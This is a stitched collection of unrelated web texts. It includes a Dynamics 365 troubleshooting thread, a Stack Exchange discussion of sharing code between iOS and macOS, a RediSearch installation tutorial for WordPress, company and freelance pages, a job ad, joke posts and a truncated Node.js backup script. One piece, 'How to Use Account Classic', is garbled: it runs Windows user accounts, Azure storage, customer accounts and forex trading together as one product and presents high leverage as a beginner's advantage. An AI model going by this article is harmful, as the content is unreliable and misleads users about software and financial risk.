If there’s no product already built or we’re starting from scratch, defining a tech stack is a good step, to begin with. This can lead to a quick proof of concept to validate a few assumptions in the Product’s context, even though, at this stage, this only unblocks a product or design decision. The initial discovery stage is crucial to success in a Sherlock Holmes mystery. The same applies to Product Development. Phase 0 gives us the necessary context to fully understand the Product, align expectations, and define the initial working points. Investing in this Phase 0 will allow us to position ourselves better to help you solve the essential mysteries that stand in the way of growing your business.
OPCFW_CODE
Personalized Community is here! Quickly customize your community to find the content you seek. Have questions on moving to the cloud? Visit the Dynamics 365 Migration Community today! Microsoft’s extensive network of Dynamics AX and Dynamics CRM experts can help. 2022 Release Wave 2Check out the latest updates and new features of Dynamics 365 released from October 2022 through March 2023 The FastTrack program is designed to help you accelerate your Dynamics 365 deployment with confidence. FastTrack Community | FastTrack Program | Finance and Operations TechTalks | Customer Engagement TechTalks | Upcoming TechTalks | All TechTalks I get the following error constantly whenever I want to open dynamics 365 dashboards. it happens to all users. "An error has occurred. Try this action again. If the problem continues, check the Microsoft Dynamic 365 Community for solutions or contact your organization's Microsoft Dynamics 365 Administrator. Finally, you can contact Microsoft Support." actually, it happened when I was trying to add a business unit.once I saved it showed an error "your access to Microsoft dynamic 365 has not yet been fully configured" and after that, it has begun to show the error "An error has occurred." I tried the resolution in this page but doesn't work I checked with 3 different browser, chrome and firefox show the error mentioned above. IE login pop-up keep asking for password while the password and credentials are correct any idea how I can resolve this problem? I enabled trace and the error is the following: # CRMVersion: 126.96.36.199 [2020-11-09 21:06:46.363] Process:Microsoft.Crm.Sandbox.WorkerProcess |Organization:00000000-0000-0000-0000-000000000000 |Thread: 14 |Category: Exception |User: 00000000-0000-0000-0000-000000000000 |Level: Error |ReqId: 00000000-0000-0000-0000-000000000000 |ActivityId: 2916573e-2ebf-4db8-86f8-bcbd95c967f5 | WarmUpMockListener.Execute ilOffset = 0x1A at WarmUpMockListener.Execute(SandboxCallInfo callInfo, SandboxSdkContext requestContext, String operation, Byte serializedRequest) ilOffset = 0x1A at ilOffset = 0xFFFFFFFF at SyncMethodInvoker.Invoke(Object instance, Object inputs, Object& outputs) ilOffset = 0x222 at DispatchOperationRuntime.InvokeBegin(MessageRpc& rpc) ilOffset = 0xC4 at ImmutableDispatchRuntime.ProcessMessage5(MessageRpc& rpc) ilOffset = 0x48 at MessageRpc.Process(Boolean isOperationContextSet) ilOffset = 0x65 at Wrapper.Resume(Boolean& alreadyResumedNoLock) ilOffset = 0x1B at ThreadBehavior.ResumeProcessing(IResumeMessageRpc resume) ilOffset = 0x8 at ExecutionContext.RunInternal(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean preserveSyncCtx) ilOffset = 0x79 at ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean preserveSyncCtx) ilOffset = 0x9 at QueueUserWorkItemCallback.System.Threading.IThreadPoolWorkItem.ExecuteWorkItem() ilOffset = 0x35 at ThreadPoolWorkQueue.Dispatch() ilOffset = 0xA4 >Crm Exception: Message: Test, ErrorCode: -2147220970 Are you online or on-premise? Is ADFS enabled? I would also recommend applying the latest cumulative update. You are on a very old version and there have been several bug fixes implemented since. Does a user with the System Administrator role have any issues logging in? Is the issue only with accessing the Dashboards? Can you access a direct link such as: https://<insert org URL>/tools/AdminSecurity/adminsecurity_area.aspx?pagemode=iframe&sitemappath=Settings%7cSystem_Setting%7cnav_security ADFS was not enabled. I install it but nothing changed. I will try to use a cumulative update and let you know the result Yes it does. none of the users can login. I can not access any links. the same error is shown. I Updated and the problem still there! Sounds like an authentication issue. Check the event log on the CRM server for any errors. Also, you can enable tracing again and reproduce the issue and then post the entire log here (omitting any personal details). That first log you posted doesn't really show the root cause. Those error codes are usually pretty generic and not useful in diagnosing the issue. Business Applications communities
OPCFW_CODE
What's a suitable cross-platform methodology for iOS and Mac OS X? There seem to be lots of answers for cross-platform frameworks for devices (iPhone + Android), and cross-platform frameworks for desktops (Mac + Win + Linux). This is a different question regarding a suitable framework, methodology, template app, tutorial, or just helpful hints, on developing native apps (not just web apps) that are cross-platform portable between a device OS and a desktop OS. I want to write a app that can run on both my iPhone (or iPad) and also be compiled to run natively on Mac OS X (and not just run in the Simulator). I am willing to live with only basic UI elements that are common to both platforms (only 1 window, generic buttons, textfields, etc.) What's the best methodology to build a pair of apps, with the minimum number of #ifdef's and other platform specific code rewrites, that will run on my iPhone and natively on my MacBook? I have a simple game I'm writing for my iPhone. I'd like to be able to play it on my Mac without firing up the SDK Simulator. There is no easy way to do this using standard UI controls. AppKit and UIKit are completely different animals. Even the basic UIView and NSView are very different in structure and function. At that level, you won't see anything that could be made cross-platform. However, there are display elements that can be made to work on Mac and iOS with minimal changes. Core Animation CALayers are one such element, in that they are the same on Mac OS X and iOS. This is why we chose to use them as the basis for the Core Plot framework, which uses an almost identical codebase to display graphs on Mac and iOS. There are a few platform-specific things to tweak (like the inverted coordinate system a UIView applies to its backing layer), but most of the code will translate to both platforms. You mention writing a game. If you are using OpenGL ES for this, much of the rendering code you write will also work on the Mac. There are a few things you will need to alter, but for the most part OpenGL ES is a subset of desktop OpenGL. However, for a simple 2-D game I'd recommend sticking with Core Animation unless you really hit a brick wall, performance-wise, simply because you will write so much less code. The items I've mentioned so far have all been in the View portion of the Model-View-Controller design pattern. Your controller code will be application-specific, but you may be able to make most of that platform-independent. If you use a simple model, or even one that relies on SQLite or Core Data for persistence, that should be trivial to make work on Mac and iOS with the same code. A Mac application and an iOS one (even between the various iOS devices) will have a very different core design. You can't just shoehorn something from one platform into another. Games are probably more portable than anything else, but you will still need to do some custom work to reflect the unique attributes of each computing device. I know the standard UI and NS controls are different. What I would like to know is if anyone has done some sort of abstraction layer for both to allow something that doesn't require as much of a complete rewrite of the UI. The view rendering stuff using Core Graphics requires very little besides a macro for the flipped y axis coordinates. Should be possible to do this between iOS and MacOS with something a lot more lightweight than the stuff used to create, for instance, linux/Windows cross platform apps. One would hope... I'm also struggling with this one; I'm using Unity3D and the free license doesn't allow native OS X plug-ins. I've just spent the last hour reading through http://rayvinly.com/how-to-build-a-truly-universal-framework-for-ios-and-mac-with-just-a-single-codebase/ Ray has done a super presentation, you can download his 30 page ebook document! He also provides a template project. I'm thinking I could use this setup to create a single drawing surface (so, a single window on both platforms) which I could draw to using SpriteKit. Then wrap mouse/touch input to create a unified input. As for ready-made frameworks, http://chameleonproject.org/ looks interesting. http://kivy.org/#home looks much more interesting: multiplatform Python wrapping GLES2 Also http://polycode.org/ http://qt-project.org/ What did you choose in the end?
STACK_EXCHANGE
Need something done? Layouts and Graphics Want to impress your audience? Amazing graphics is the way to go! Using NodeCG, there are infinite possibilities when it comes to displaying information on screen. In terms of layouts, I can create a basic pack for you, or give me some custom layouts and I'll import them into NodeCG. All layout-based work is compatible with my Speedcontrol Layouts bundle. If you need some custom custom layouts, like a donation shower or scoreboard, I can do that as well! Give me the specs, and I'll get right to work making your vision become a reality! Layouts are neat and such, but they become useless if you cannot control them properly. With Restreamer Dashboard, that's not a problem! Easily control OBS from the comfort of your own browser, without having to connect to another PC via Teamviewer. Add a feature to the existing software, or create a whole new system, you pick. Need someone to host everything? My server is up to the task! Depending on the project, either NodeCG or Node-Red will be used. Take your event to the next level with custom Discord bots! Post donations in chat every time one comes in (shown here), manage runners and commentators, add some reaction roles, the possibilities are endless! Depending on the size of your organization and the complexity of your project, my prices usually range from $20 to $200. Yes, it's really that simple. Included in the price are unlimited revisions, all source files and full support in case you run into problems. Commissioned projects are usually posted to Github for others to use, but if you rather keep your project private, you're welcome to ask at no extra charge. If you need your project done faster than the regular timeframe, I charge between $10 and $50 extra, depending on my availability and the size/complexity of your project. Payment is done through Paypal, and done in two steps. Before starting the project, I ask for a upfront deposit amounting to 50% of the final cost. Once your project is completed to your satisfaction, the remaining balance is paid. If for some reason I cannot complete your project or you are unsatisfied with the result, you are entitled to a refund of your deposit. No refunds will be issued to completed projects already paid in full. Most communications are done through Discord, which is my preferred way of communication. If Discord's not your thing, I'm also willing to communicate via email. I usually respond within 24 hours of any message. Every couple days or so, I like to send out a message outlining the current state of your project. If possible, I also provide photos and/or demos of your project. Feel free to reach out at anytime to make changes or to discuss possible improvements. Timeframe and Availability Depending on the size and complexity of your project, the time between conception and completion is usually a couple weeks. This includes the actual development, testing, and revisions. If you're too eager to wait, I do offer faster development at a premium. The timeframe for that is about a week or two, depending on the size/complexity of your project. In terms of availability, I'm usually available during most times of the year. I am currently studying in college, so availability may be limited or nonexistent during periods of high activity, such as school projects or exams. On top of that, I also participate in various marathons during the year, so availability may be limited at those times as well. Keep in mind that school and other marathons are prioritized over commissioned work. I believe that communication is important, so I'll make sure to let you know of any conflicts before starting your project. In the event that I need to delay a project due to an unforeseen circumstance, I'll let you know as soon as possible. All my commission work comes with full support. If you ever run into problems down the road, let me know and I'll fix it, or walk you through the solution. This also includes an installation walkthrough, bugfixes, and more. If you would like to add additional features to your project after completion, I may or may not ask for a payment depending on the age of the project, the complexity, and my availability. Please reach out to me for more information.
OPCFW_CODE
It's time to do your best work with the power of modern AI. Our legal assistant frees you from poring over paper and enables you to focus on the truly strategic aspects for unmatched results. Important information is buried in boilerplate, scattered across thousands of documents, changing under new versions - yet you are responsible for making the right decision. Let our next-generation document understanding AI handle the tedious, repetitive work and give your team a competitive advantage when tackling complex tasks. Leave behind the limitations of keyword search: Our search engine speaks your language! With legal context understanding, formulating research questions has never been more intuitive. Sensitive information can take many forms and can often be revealed by subtle clues that are extremely hard to spot. That’s why our AI does not use a fixed list of things to look for, but instead has learned in which contexts a piece of information is a candidate for redaction. Here you find all the lastest media coverage, award announcements, press releases and more Bis vor Kurzem hatte Paulina Grnarova nicht viel mit dem Rechtswesen zu tun. Seit diesem Frühling beschäftigt sich die 30-Jährige fast pausenlos mit diesem Gebiet – seit sie mit drei Partnern in Zürich DeepJudge gegründet hat.Read more Paulina Grnarova lächelt, wenn die üblichen Klischees kommen. Ja, die Leute seien überrascht, wenn sie sage, sie habe Computer Science studiertRead more For the 21st year in a row, cantonal and federal authorities together with key players from the private industry are meeting to discuss evolutions in #legaltechnologyRead more ETH spin-off DeepJudge wins final stage of Venture Kick! Congratulations and best of success to founders Paulina Grnarova, Kevin Roth, Florian Schmidt, and Yannic Kilcher!Read more Our CEO, Paulina, gave a keynote on the recent breakthroughs in #AI and showed how they will affect the future of the #legal profession!Read more Tomorrow we'll be heading out to the AI+X Summit 2021 organized by the ETH AI Center and the ETH Entrepreneur Club.Read more Die sechste Auflage der Swiss FinTech Awards geht in die letzte Runde. Die Jury hat aus zehn Nominierten vier Finalisten ausgewählt. In der Kategorie Early Stage, für Fintech-UnternehmenRead more DeepJudge is the first ETH AI center spinnoff representing startups who turn their research into products to enter the global arena of AI-first solutions. Our mission stood up to the competition in front of various industry juries and we are grateful for receiving significant financial support from Venture Kick Stage 1-3, SNF Bridge and Innobooster by Gebert Rüf Stiftung. Since our incorporation in early 2021, our journey didn’t go unnoticed and we are excited to have received various prestigious awards including Forbes 30under30, Digital Shapers and Swiss Fintech Awards. Coming right from the frontier of AI research, our founding team of AI experts redefines the role of legaltech solutions in legal practice. Equipped with four PhDs in AI and 5+ years of experience in big tech companies, we know how to build AI systems that deliver the levels of quality, reliability and privacy that legal workflows demand. During her PhD Paulina has seen the AI revolution first hand at ETH and Google and decided it is time to challenge the status quo in legaltech with her own team of AI experts. While her PhD connected researches from OpenAI, Google Brain, and ETH Zurich, it's now her mission at DeepJudge to connect the legal world with AI technology. Kevin is a physicist turned computer scientist with a knack for data and algorithms. Kevin holds a PhD in Machine Learning from ETH Zürich. He was awarded the ETH Medal in Physics and has worked at Google Brain in Berlin and Microsoft Research in Cambridge UK. Yannic is our all-rounder: beyond his experience as a software engineer, his PhD at ETH and work at Google AI Language have put him in the forefront of training, building and deploying ML models. He is now leading the technical developments at DeepJudge. Florian has a passion for text data and designs our core document understanding AI. During his PhD at ETH he focused on AI models that generate text and worked with Typewise on the future of predictive keyboards. Lucas is a machine learning engineer working on large-scale natural language processing. Before joining DeepJudge, he conducted research for Aleph Alpha, a German startup working on Artificial General Intelligence. Outside of work, he’s also an active member of HomebrewNLP and MLCommons. Bilaal holds a Master of Law and is currently taking the bar exam. Thanks to his diverse experience throughout his legal training, he provides us with input to develop our product and acts as our in-house legal counsel. 20 Years of digital experience for international companies around the globe. As a former lead designer of one of the world’s largest manufacturers of custom software and consulting providers, he now contributes to the DeepJudge team. Dimitri is fascinated by algorithms and programs of all kinds. He’s especially interested in the intersection of AI and artistic applications, e.g. artificially generating music. After graduating as a Bachelor in Computer Science from ETH Zurich, his passion for applications of AI has led him to DeepJudge, where he applies the latest AI research to make people’s lives just a little bit easier. Marvin is a software developer currently studying at ETH Zurich, where his interest in AI & the application of it to natural language has led him to DeepJudge. He is currently working as part of the ML team to do research and help further develop the product. Jürgen studied computer science and has several years of experience in software engineering and software architecture in different industries (life science, finance, insurance). He is fascinated about combining Software Engineering with Machine Learning/AI and building new solutions based on that. He is currently working on his M.Sc. in Artificial Intelligence. Lukas is a software engineer who is passionate about creating fast and modern products using cutting-edge technology, a mission which is well aligned with his role at DeepJudge. Prior to joining, he studied Computer Science at ETH Zurich and was a part of the Code Expert Development team and acted as a board member of the student association VIS. Aashna is curious about the world of AI, and sees tremendous potential in using language as a way to connect people and make technology more widely accessible. She is currently starting her Master’s in Electrical Engineering at ETH Zürich, and is supporting DeepJudge part-time in our mission to revolutionise the legal industry!
OPCFW_CODE
My friends speak quite highly of helium. The Sun is an average of 92.96 million miles from the truth. I'll believe it when I see it reported in an actual newspaper. I've lost count of the number of times something popped up while I'm typing, just as I'm about to press the Enter or ESC keys, leaving me wondering what I just broke or signed up to. In Windows 10, non-critical messages are signaled in the status bar. A flashing icon could be less destructive than an easily-dismissed dialog. "fans are handed a special pouch that is locked up with their smartphone inside the fan keeps that pouch with them during the event" Has anyone really been far even as decided to use even go want to do look more like? This is huge news for those of us that suffer from arthritis. No more struggling with those ridiculously thin pencils! Freedom at last! I was lucky enough to find a lightly-used Surface Pro 3 (i7, 8 GB RAM, 256 GB SSD storage) with 2 pens, keyboard (or whatever Microsoft call it) and full-sized dock for less than half price. With a 128 GB micro-SD card, it gives me 4-6 hours of battery to do the 'serious' stuff which, in my case, is photo processing (Lightroom 4,ON1 Photo 10, Photoshop Elements) and music making (Presonus Studio One, Ableton Live 9.5, Komplete 10, etc). Plenty for my needs, and it slips into the skinny laptop compartment of my rucksack with room to spare. (It actually also fits into the map pocket of my gilet, but that's another story). Also in my rucksack is a small, lightweight Bluetooth mouse for when the pen and/or keyboard aren't enough - it doesn't get a lot of use. In my pocket is an 8" Acer Windows tablet which also gives me 4-6 hours of 'consumption', including G+, Twitter, web browsing, maps, train and other transit times, magazine and book reading, etc, etc. It has 32 GB of storage space (plus a 64 GB micro-SD card) and 1 GB of RAM. As it's an 8" device, it runs full Windows 10 desktop. Out and about, they connect to the net (and so to OneDrive, Dropbox, etc) via my 10 GB per month 4G to WiFi dongle. At home, they're on the same Workgroup as my PC, so I can drag and drop files between them at LAN (the Surface) or WiFi (the Acer) speeds. This combination of two tablets serve my needs very well. Perhaps the OP might consider this solution. If a subordinate asks you a pertinent question, look at him as if he had lost his senses. When he looks down, paraphrase the question back at him.
OPCFW_CODE
How to Use Account Classic Account Classic is a program that allows you to manage your users, your storage and your customers. You can also create a new account and delete an existing one. It’s very easy to get started and learn how to use it. Delete an account If you are looking for a quick and easy way to remove yourself from the social networking fraternity, you’ve come to the right place. You can easily delete your account and re-register with a new username. The process takes less than five minutes, and you don’t even have to provide a credit card. To take it one step further, you can also choose to have your account auto-refresh on an ad hoc basis. There is one minor downside to this approach; you won’t be able to reply to any messages you receive. However, you’ll be able to re-post your selected content later on. This option is useful when you want to hide all of your posts and comments, but you’re not in the mood to write anymore. Create a customer account Using a classic customer account has many benefits. These include the correct billing details and the ability to save credit card information. It also enables the customer to see a real-time summary of their order status and if they’ve purchased more than one item, they can even track which items were sent in a package. In the event a shipment is lost, missing or broken, the customer can log into the account and have their order replaced. Creating a customer account is the cheapest way to make a purchase. This is especially true if you are offering a subscription product. There are also tools and services available to help you manage your customer list. Using an account management software tool can help you keep track of your most valuable customers. The best part is you can even set up alerts for when these customers become eligible for discounts or special offers. Create a storage account The Azure team has made it possible to create classic storage accounts in the Azure portal using the old PowerShell cmdlets. These accounts can be used to host Resource Manager virtual machines. However, this type of account cannot be migrated to a newer type. To create a classic storage account, you will need to use the New-AzureStorageAccount command. This cmdlet will create a storage account that can be assigned to an existing resource group. It also sets the access tier. You can then upload content to the blob storage in the new account. If you need to configure a custom module for the storage account, you will need to use the Runbook to do so. You can also explore the data in the account with the Storage Explorer. Create a trading account If you’re thinking of starting to trade the foreign exchange market, you’ll need to choose the right type of account. There are several types to choose from, depending on your time and money commitment. Mini trading accounts are designed for novice traders. Unlike the standard account, mini trading accounts allow you to open positions with a smaller amount of capital. Besides allowing you to trade with a lower amount of capital, this type of account offers you a variety of advantages. For example, you’ll be able to use leverage up to 400:1. This allows you to earn higher profits in case you manage to make a successful investment. The standard trading account is suitable for beginners, intermediate investors, and professional traders. This type of account enables you to buy and sell stocks and other securities within a single platform. The Classic User Accounts applet is not displayed by default. Instead, it must be manually enabled using the control userpassword2 command. This will allow you to manage users, add users, and edit their information. If you’re a site administrator, you can access the Manage Users menu through the Manage Access> Roles page. This menu is accompanied by a drop-down list for all of your current user accounts. You can then search for and sort users by email address, username, or by any number of other criteria. You can also use the Manage Users window to edit user information or assign them to a new group. There are two types of users you can work with: those that have an identity domain administrator (IDDAM) account and those that do not.
OPCFW_CODE
报告时间:2018年10月9日(周二)下午2:30 - 4:30 报告人: 张彬铮 香港大学地球科学系 助理教授 It is now over three decades since the first paper was published using the code that has come to be known as LFM (Lyon-Fedder-Mobarry). The code, used since then extensively in heliophysics research, had a number of novel features: eighth-order centered spatial differencing, the Partial Donor Cell Method limiter for shock capturing, a non-orthogonal staggered spherical mesh with constrained transport, conservative averaging-reconstruction for axis singularities and the capability to handle multiple ion species. However the computational kernel of the LFM code, designed and optimized for architectures long retired, has aged and is difficult to adapt to the modern multicore era of supercomputing. To carry its legacy forward, we re-envisage the LFM as GAMERA, Grid Agnostic MHD for Extended Research Applications, which pre- serves the core numerical philosophy of LFM while also incorporating numerous algorithmic and computational improvements. The upgrades in the numerical schemes include accurate grid metric calculations using high-order Gaussian quadrature techniques, high-order upwind reconstruction, non-clipping options for interface values. The improvements in the code implementation includes the use of data structures and memory access patterns conducive to aligned, vector operations and the implementation of hybrid parallelism, using MPI and OMP. Thus, while keeping the best elements of LFM, GAMERA is designed to be a portable and easy-to-use code that provides multi-dimensional MHD simulations in non-orthogonal curvilinear geometries on modern super- computer architectures. The new, efficient and high-quality numerical kernel is currently serving as a backbone of a whole geospace model. Extended applications include magnetospheres of Jupiter/Saturn and Mercury/Venus, inner heliosphere, solar corona and a basic plasma physics simulation box. 张彬铮教授于2005年和2007年分别获浙江大学电子工程专业学士和硕士学位,2012年获美国Dartmouth College工程科学博士学位。2012-2015年在Dartmouth College担任研究科学家与讲师,2015-2017年在美国国家大气研究中心(NCAR)开展博士后研究,2018年至今受聘香港大学地球科学系,担任助理教授。张教授在MHD模拟算法、空间天气大型建模、M-I Coupling以及行星物理研究等领域均取得突出的研究成果,主持了多项美国NSF和NASA科研项目,同时也是多个NSF和NASA项目的共同负责人和重要参与人,发表高水平SCI文章40余篇,多次受邀在AGU等地球科学国际大会上做专题口头报告。
OPCFW_CODE
Redis is a key value storage system that can be configured to speed up websites and those running WordPress and WooCommerce. It is typically used as the fast storage system for WordPress and WooCommerce external object cache (using for example this plugin). But Redis has grown and become more versatile! You can actually build modules for Redis and one of those is called RedisSearch. Thanks to Foad Yousefi, we have a plugin that can leverage RediSearch and it appears to be a fork of ElasticPress which uses Elasticsearch (installation guide) as the search engine for WordPress and WooCommerce whenever possible. The Redis equivalent plugin of ElasticPress is called RediSearch just like the module. This tutorial does assume you have already installed Redis server. We will be using Ubuntu 18.04 for this tutorial to build the RediSearch extension and add it to our Redis configuration. You will generally need root or sudo access to accomplish this. You should test this on a staging server first! Getting Started with RediSearch First we need to build the RediSearch extension and afterwards we need to configure the RediSearch WordPress plugin. Build RediSearch Module Extension First let’s update our package repostiory list and install the building tools and git apt install cmake build-essential git -y Enter your temporary folder and clone the repo, enter the folder and generate the build file git clone https://github.com/RedisLabsModules/RediSearch.git cmake .. -DCMAKE_BUILD_TYPE=RelWithDebInfo You should see a lot of output like this -- The C compiler identification is GNU 7.3.0 -- The CXX compiler identification is GNU 7.3.0 -- Check for working C compiler: /usr/bin/cc -- Check for working C compiler: /usr/bin/cc -- works -- Detecting C compiler ABI info -- Detecting C compiler ABI info - done -- Detecting C compile features -- Detecting C compile features - done -- Check for working CXX compiler: /usr/bin/c++ -- Check for working CXX compiler: /usr/bin/c++ -- works -- Detecting CXX compiler ABI info -- Detecting CXX compiler ABI info - done -- Detecting CXX compile features -- Detecting CXX compile features - done -- Performing Test HAVE_W_INCOMPATIBLE_POINTER_TYPES -- Performing Test HAVE_W_INCOMPATIBLE_POINTER_TYPES - Success -- Performing Test HAVE_W_DISCARDS_QUALIFIERS -- Performing Test HAVE_W_DISCARDS_QUALIFIERS - Failed CMake Deprecation Warning at CMakeLists.txt:6 (CMAKE_POLICY): The OLD behavior for policy CMP0026 will be removed from a future version The cmake-policies(7) manual explains that the OLD behaviors of all policies are deprecated and that a policy should be set to OLD only under specific short-term circumstances. Projects should be ported to the NEW behavior and not rely on setting a policy to OLD. CMake Warning (dev) at CMakeLists.txt:113 (GET_TARGET_PROPERTY): Policy CMP0045 is not set: Error on non-existent target in get_target_property. Run "cmake --help-policy CMP0045" for policy details. Use the cmake_policy command to set the policy and suppress this warning. get_target_property() called with non-existent target "example_extension". This warning is for project developers. Use -Wno-dev to suppress it. -- Configuring done -- Generating done -- Build files have been written to: /tmp/RediSearch/cmake Now you can build the RediSearch module with this command You will see a long list of output which finishes like this Scanning dependencies of target redisearch [ 91%] Building C object CMakeFiles/redisearch.dir/src/module-init/module-init.c.o [ 92%] Linking C shared library redisearch.so [ 92%] Built target redisearch Scanning dependencies of target sizes [ 92%] Building CXX object CMakeFiles/sizes.dir/src/c_utils/sizes.cpp.o [ 93%] Linking CXX executable sizes [ 93%] Built target sizes Scanning dependencies of target redisearchS [ 93%] Linking C static library libredisearchS.a [ 93%] Built target redisearchS Scanning dependencies of target test_vector [ 94%] Building C object src/rmutil/CMakeFiles/test_vector.dir/test_vector.c.o [ 95%] Linking C executable test_vector [ 95%] Built target test_vector Scanning dependencies of target test_args [ 96%] Building C object src/rmutil/CMakeFiles/test_args.dir/test_args.c.o [ 96%] Linking C executable test_args [ 96%] Built target test_args Scanning dependencies of target test_cmdparse [ 97%] Building C object src/rmutil/CMakeFiles/test_cmdparse.dir/test_cmdparse.c.o [ 97%] Linking C executable test_cmdparse [ 97%] Built target test_cmdparse Scanning dependencies of target test_heap [ 98%] Building C object src/rmutil/CMakeFiles/test_heap.dir/test_heap.c.o [ 98%] Linking C executable test_heap [ 98%] Built target test_heap Scanning dependencies of target test_periodic [ 99%] Building C object src/rmutil/CMakeFiles/test_periodic.dir/test_periodic.c.o [ 99%] Linking C executable test_periodic [ 99%] Built target test_periodic Scanning dependencies of target test_priority_queue [100%] Building C object src/rmutil/CMakeFiles/test_priority_queue.dir/test_priority_queue.c.o [100%] Linking C executable test_priority_queue [100%] Built target test_priority_queue Now there is an extension file called redisearch.so in the Let’s copy that somewhere that makes sense and make a Redis modules folder, then copy over the extension file mkdir -p /etc/redis/modules cp /tmp/RediSearch/cmake/redisearch.so /etc/redis/modules/redisearch.so Now reference this module in the redis.conf file by adding this line To do so you can use nano or your favorite Linux text editor sudo nano /etc/redis/redis.conf I added it at the bottom here, you may want to adjust how much RAM is available to Redis as well in the future. # create a unix domain socket to listen on # set permissions for the socket # requirepass passwordtouse # maximum memory allowed for redis # how redis will evict old objects - least recently used Reload Redis server to activate the new configuration with RediSearch module enabled. sudo service redis-server restart Now it is time to move on to the application side of things and configure the WordPress plugin to work with RediSearch. Configure the RediSearch WordPress Plugin Time to install the RediSearch WordPress plugin. I prefer to do this via WP-CLI wp plugin install redisearch --activate Now we need to add the Redis server settings in the RediSearch plugin. In the wp-admin sidebar find Redisearch and then go choose Redis server For the Redis server set 127.0.0.1 or your address in For the Redis port set 6379 or whatever is set in your Give the index a name under Redisearch index name and click Save Now navigate to Redisearch > Indexing options Choose your options here, I recommend checking Write redis data to the disk so that you do not have to re-index if Redis restarts for one reason or another. Remember to click Save changes. Now you can start the indexing process by going to Redisearch > Redisearch Click the icon on the left to begin the indexing from MySQL to Redis. That should take care of it! Verify RediSearch Index Data If you want to verify that your WordPress or WooCommerce data was indexed using RediSearch you can log in to the Redis server via the Redis cli. You should then see this prompt which shows you are in the Redis-CLI administration prompt. Then you can type INFO keyspace at the 127.0.0.1:6379> prompt and select the database that shows up (here Selecting the Redis database in the CLI is this simple If the database exists you will get this message showing success Then you can list all of the keys for that index When you are done you can exit the redis-cli I hope you had fun with this 🙂
OPCFW_CODE
Sr. Analyst Services Developer Job Description Summary The GOS Global Technology Service group, is a team of dedicated IT consultants, project managers and business analysts that support our client technology solutions through best-in-class software systems utilizing a service delivery model to deliver value within a clear, consistent and measurable framework. Additionally, we provide assessment, technology roadmap, transition and integration services as well as a continuous improvement-based support model to ensure an ongoing technology investment for the duration of our client relationships. In support of Global Occupier Services, our team also provides business development support including solution definition, pricing, technology demonstration and delivery for Strategy and Portfolio Administration Services, Transaction & Project Management Transaction, Facilities (IFM), Space & Occupancy, and Financial Management. We are looking for an experienced Analysis Services/Business Intelligence Developer to help build and improve a global BI platform built primarily on the Microsoft stack in Azure. You will use your design, coding and business analysis skills to create, maintain and enhance data objects and measures in Azure Analysis Services tabular models as part of a structured software development lifecycle. There will also be an element of business analysis and documentation to support the tabular models that make up the semantic layer. Ultimately, you will help develop tabular models and contribute to reporting solutions to ensure company information is presented securely and accurately. BAU Data Warehouse Support - troubleshoot and fix analysis services issues including sometimes complex business logic implemented in Power Query and/or DAX within our BI solution consolidating data from various applications for internal and external clients Platform Development - create and enhance multiple tabular models as part of planned platform development projects and activities Transition Management - support the technology components of new client on boarding to include such items as building and testing objects and measures in tabular models, etc. Client Project Services - carry out technology project related activities to include such items as requirements capture, business rule specification, tabular model design, change management routines in Azure Analysis Services and Power BI Collateral development - in supporting the DW solutions the role includes activities such as documenting the new implementations and changes in the data model to be able to compile for multiple IT and Business standards Key Performance Indicators: Delivery to deadlines Internal and external client satisfaction Number of requests from others to do things (precise measures to be agreed) Knowledge & Experience: At least 5 years solid Power Query and DAX coding experience with tabular models using SQL Server Analysis Services (including SSAS 2016 or greater) and/or Azure Analysis Services Demonstrable experience as technical lead in the design of tabular models from scratch as part of a semantic layer implementing complex business logic supporting visualizations in Power BI Experience gathering and analyzing business requirements; documenting their technical implementation Experience or knowledge of Power BI as a pure visualization layer using direct query Routine use of source control (Git, SVN, TFS, etc) as part of regular BI development activities. Knowledge of conceptual, logical and physical data modeling, dimensional models, star schemas, etc. (although this is not a data modeling role) Proven experience troubleshooting and resolving analysis services issues. Debugging, identifying bugs and driving them to closure by working closely with the development team Tabular model performance tuning, partitioning and optimization experience Work closely with a multi-disciplinary team in an Agile / Scrum environment ensuring quality deliverable end of each sprint. Good communication skills in creating and maintaining technical documentation Familiarity with test management (UAT, unit testing, system integration testing and release to live processes) Project Management Methodologies Nice to have Tabular model development and deployment accelerators such as BISM Normalizer or Analysis Services Deployment Wizard. Test-driven BI development using NBi, SentryOne Legitest, DbFit or other testing frameworks IT Infrastructure Library (ITIL) Foundations / Software Development Lifecycle Management (SDLC) Involvement with BI community activities or newsgroups Any exposure to Azure LogicApps or PowerApps would also be welcome An understanding of software engineering principles, particularly the database lifecycle management (DLM) process e.g. version-controlled releases; branching & merging; partially or fully automated release builds, continuous integration/delivery, etc. Skills & Personal Qualities: Forward Planning: Plans for business activities; anticipates resource requirements; builds in contingency and flexibility Enabling Delivery: Retains a strong focus on delivering results to high standards despite constraints or setbacks; monitors and controls performance; uses resources effectively to ensure delivery Change Orientation: Responds positively to change and new ideas Building Relationships: Establishes and nurtures harmonious relationships both externally and internally. Project Management Skillset: Ability to manage the needs of clients and organize vendor-related tasks, meet KPIs set by the business. Cushman & Wakefield provides equal employment opportunity. Discrimination of any type will not be tolerated. Cushman & Wakefield is an Equal Opportunity / Affirmative Action employer. All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, sexual orientation, gender identity, disability, protected veteran status or any other characteristic protected by state, federal, or local law. Cushman & Wakefield
OPCFW_CODE
const Payload = require('../utils/Payload'); const { upload } = require('../utils/wetransfer_upload'); const dumpDataBase = require('../utils/pgFunctions').dumpDataBase; const uploadFile = async (params) => { sendMsg(params, `Preparando o upload do arquivo`); const files = [ new Payload({ filePath: params.filePath }) ]; const newUpload = upload('', '', files, `Backup do banco ${params.nomeBanco}. By Ninja!`, 'en') .on('progress', progress => sendMsg(params, `${progress.percent*100}% - ${progress.size && progress.size.transferred} de ${progress.size && progress.size.total}`)) .on('end', (end) => sendMsg(params, `Processo Finalizado: ${end.shortened_url}`)) .on('error', (error) => sendMsg(params, error)); ; } const backupDataBase = async (params) => { /** * params.nomeBanco = nome do banco de dados que será feito o backup * params.filePath = caminho onde o backup será salvo * params.hasFileNameOnPath = boleano que diz se o nome do arquivo já está no caminho. Se não estiver o script vai utilizar o nome banco para nomear o arquivo. * params.msg = método que será utilizado para informar o usuário o status da execução do procedimento */ return new Promise( async (resolve, reject) => { // Verificando se os parâmetros foram preenchidos if (!params) { throw Error(`Nenhum parâmetro informado.`) } if (!params.nomeBanco) { throw Error('Nome do banco não informado.'); } if (!params.filePath) { throw Error('O local onde o arquivo será salvo 